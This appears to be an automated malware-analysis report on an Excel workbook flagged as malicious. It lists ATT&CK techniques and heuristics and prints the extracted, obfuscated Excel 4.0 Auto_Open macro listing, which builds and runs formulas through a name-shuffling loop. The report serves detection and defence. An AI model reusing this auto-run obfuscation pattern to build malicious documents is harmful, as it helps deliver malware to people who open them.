MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open function, which is a known method for executing malicious code. The critical heuristics indicate the presence of dangerous formula APIs within the Auto_Open macro, suggesting it's designed to run arbitrary commands. No specific family could be identified, but the technique points to a macro-based execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6617 bytes |
SHA-256: f290af50e7219ceda46ea9a8a2f4ae5ff2269126524b7be329e629cd195ba8bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - pQyhpgw
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I164
' 0018 25 LABEL : Cell Value, String Constant - AVSuLygZlq len=0
' 0018 23 LABEL : Cell Value, String Constant - BQWUoSUZ len=0
' 0018 25 LABEL : Cell Value, String Constant - dxMyKMLYYH len=0
' 0018 23 LABEL : Cell Value, String Constant - EdDZCFnb len=0
' 0018 20 LABEL : Cell Value, String Constant - fQaLp len=0
' 0018 27 LABEL : Cell Value, String Constant - gmnIWbOdkruj len=0
' 0018 24 LABEL : Cell Value, String Constant - iRepXvLfe len=0
' 0018 23 LABEL : Cell Value, String Constant - MdSYAFvD len=0
' 0018 23 LABEL : Cell Value, String Constant - MZJqyaJi len=0
' 0018 27 LABEL : Cell Value, String Constant - pkYqYVzXNUaN len=0
' 0018 24 LABEL : Cell Value, String Constant - QcVEIRcDU len=0
' 0018 21 LABEL : Cell Value, String Constant - QhAAmA len=0
' 0018 26 LABEL : Cell Value, String Constant - qZKGYBasTyD len=0
' 0018 25 LABEL : Cell Value, String Constant - TuaaSxMIQX len=0
' 0018 27 LABEL : Cell Value, String Constant - UcnhzmOYvFsJ len=0
' 0018 27 LABEL : Cell Value, String Constant - vxMybXsPyqoW len=0
' 0018 22 LABEL : Cell Value, String Constant - wIaSWXT len=0
' 0018 24 LABEL : Cell Value, String Constant - YESRznxjV len=0
' 0018 25 LABEL : Cell Value, String Constant - yKchkVVCmW len=0
' 0018 26 LABEL : Cell Value, String Constant - ZRZqSquCbrJ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' pQyhpgw,I75,"SET.NAME("QcVEIRcDU",VALUE("0"))",""
' pQyhpgw,I79,"SET.NAME("iRepXvLfe",QcVEIRcDU)",""
' pQyhpgw,I83,"SET.NAME("QhAAmA",QcVEIRcDU)",""
' pQyhpgw,I85,"SET.NAME("TuaaSxMIQX",COUNTA(dxMyKMLYYH))",""
' pQyhpgw,I90,"SET.NAME("gmnIWbOdkruj",COUNTA(yKchkVVCmW))",""
' pQyhpgw,I95,[],""
' pQyhpgw,I97,"SET.NAME("wIaSWXT","")",""
' pQyhpgw,I101,"iRepXvLfe",""
' pQyhpgw,I106,"SET.NAME("UcnhzmOYvFsJ",HLOOKUP("*",dxMyKMLYYH,iRepXvLfe,FALSE))",""
' pQyhpgw,I109,"fQaLp",""
' pQyhpgw,I111,"SET.NAME("YESRznxjV",QcVEIRcDU)",""
' pQyhpgw,I116,[],""
' pQyhpgw,I120,"YESRznxjV",""
' pQyhpgw,I122,"BQWUoSUZ",""
' pQyhpgw,I124,"MdSYAFvD",""
' pQyhpgw,I129,"ZRZqSquCbrJ",""
' pQyhpgw,I131,"SET.NAME("qZKGYBasTyD",VALUE(HLOOKUP("*",yKchkVVCmW,ZRZqSquCbrJ,FALSE)))",""
' pQyhpgw,I136,"MZJqyaJi",""
' pQyhpgw,I139,"wIaSWXT",""
' pQyhpgw,I143,"QhAAmA",""
' pQyhpgw,I146,NEXT(),""
' pQyhpgw,I148,"AVSuLygZlq",""
' pQyhpgw,I153,"SET.NAME("f",INT(T(FORMULA(T(wIaSWXT)&"",""&T(AVSuLygZlq)))))",""
' pQyhpgw,I155,"vxMybXsPyqoW",""
' pQyhpgw,I160,NEXT(),""
' pQyhpgw,I162,RETURN(),""
' pQyhpgw,I184,"SET.NAME("pkYqYVzXNUaN",I75)",""
' pQyhpgw,I188,"dxMyKMLYYH",""
' pQyhpgw,I193,"SET.NAME("yKchkVVCmW",R93C12)",""
' pQyhpgw,I195,"SET.NAME("vxMybXsPyqoW",203)",""
' pQyhpgw,I199,"SET.NAME("EdDZCFnb",9)",""
' pQyhpgw,I202,pkYqYVzXNUaN(),""
' pQyhpgw,I203,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.